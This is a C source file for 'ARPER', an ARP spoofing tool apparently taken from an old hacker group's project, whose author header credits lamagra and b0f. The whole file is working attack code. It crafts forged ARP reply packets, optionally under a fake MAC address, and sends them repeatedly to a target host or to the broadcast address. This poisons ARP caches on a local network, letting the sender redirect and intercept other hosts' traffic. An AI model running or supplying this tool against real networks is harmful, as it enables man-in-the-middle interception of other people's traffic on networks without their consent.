/*
    ARPER: an arpspoofer
    this is part from project aurora by lamagra <access-granted@geocities.com>
    http://lamagra.seKure.de

    -lamagra: member of b0f http://www.b0f.com
 */ 

#include <stdio.h>
#include "spooflnk.c"

int redirect(char *device,unsigned char *sha, unsigned long spa, 
               unsigned char *tha, unsigned long tpa, int type,int number);
int lookup_mac(char *device,unsigned long ip,struct ether_addr *mac);
              
struct arp_hdr
{
    unsigned short ar_hrd;
    unsigned short ar_pro;
    unsigned char  ar_hln;
    unsigned char  ar_pln;
    unsigned short ar_op;

    unsigned char ar_sha[6]; 
    unsigned char ar_spa[4]; 
    unsigned char ar_tha[6]; 
    unsigned char ar_tpa[4]; 
};

extern int optind;
extern char *optarg;

void main(int argc,char **argv)
{
  unsigned long src,dest = 0;
  char *device = "eth0";
  char ch;
  struct ether_addr target,source;
  int fflag = 0;
  
  while((ch = getopt(argc,argv,"fi:h?t:")) != EOF)
  {
    switch(ch)
    {
        case 'i': device = optarg;
                  break;
                  
        case 't': dest = inet_addr(optarg);
                  break;

        case 'f': fflag = 1;
                  break;

        default: printf("Unknown option '%c', ignoring\n");
    }
  }

  if((argc - optind) != 1)
  {
    printf("Usage: %s [-i <device>] [-t <target>] [-f (use fake MAC)] <source>\n",argv[0]); 
    exit(-1);
  }

  src = inet_addr(argv[optind]);

  if(dest)
    if(!lookup_mac(device,dest,&target))
    {
        printf("Can't get the MAC address for %s\n",inet_ntoa(dest));
        exit(-1);
    }

  if(fflag)
    redirect(device,"\xaa\xbb\xcc\xdd\xee\xff",src,(dest)?(unsigned char *)&target:0,dest,ARPOP_REPLY,0);
  else
    redirect(device,0,src,(dest)?(unsigned char *)&target:0,dest,ARPOP_REPLY,0);  
}

int lookup_mac(char *device,unsigned long ip,struct ether_addr *mac)
{
    int i;

    for(i = 0;(i < 3) && arp_cache_lookup(device,ip,mac) == -1;i++)
    {
        redirect(device,0,0,0,ip,ARPOP_REQUEST,1);
        sleep(1);
    }
    return (i != 3);
}

/* 
 *  redirect(device,source MAC,source ip,dest MAC,dest ip,arptype,# of packets);
 *  return: nothing
 */
int redirect(char *device,unsigned char *sha, unsigned long spa, 
               unsigned char *tha, unsigned long tpa, int type,int number)
{
    /* this buffer holds the arppacket */
    char buf[sizeof(struct ether_header) + sizeof(struct arp_hdr)];
    struct ether_header *eh;
    struct arp_hdr *arp;    
    struct link_int *lnkint;
    int i = 1; 

    memset(buf,0,sizeof(struct ether_header) + sizeof(struct arp_hdr));   

    eh  = (struct ether_header *)buf;
    arp = (struct arp_hdr *)(buf + sizeof(struct ether_header));

    if((lnkint = open_lnk(device)) == 0)
    {
        perror("Couldn't open linkinterface");
        exit(-1);
    }

    if(!sha)
    {
        if((sha = (unsigned char *)hwaddr(lnkint)) == (unsigned char *)-1) 
                return -1;
    }

    if(!spa)
    {
        if((spa = ipaddr(lnkint)) == 0) 
                return -1;
    }
    
    if(!tha) tha = "\xff\xff\xff\xff\xff\xff";

    memcpy(eh->ether_dhost,tha,ETHER_ADDR_LEN);
    memcpy(eh->ether_shost,sha,ETHER_ADDR_LEN);
    eh->ether_type = htons(ETHERTYPE_ARP);    

    arp->ar_hrd = htons(ARPHRD_ETHER); 
    arp->ar_pro = htons(ETHERTYPE_IP);
    arp->ar_hln = ETHER_ADDR_LEN;
    arp->ar_pln = 4;
    arp->ar_op  = htons(type);
    memcpy(arp->ar_sha,sha,ETHER_ADDR_LEN);
    memcpy(arp->ar_spa,(unsigned char *)&spa,4);
    memcpy(arp->ar_tha,tha,ETHER_ADDR_LEN);
    memcpy(arp->ar_tpa,(unsigned char *)&tpa,4);

    do
    {
        if(write_lnk(lnkint,buf,sizeof(struct ether_header) + sizeof(struct arp_hdr)) == -1)
        {
            perror("write_lnk");
            exit(-1);
        }
        sleep(2);
    }while(i++ != number);
    
    close_lnk(lnkint);
}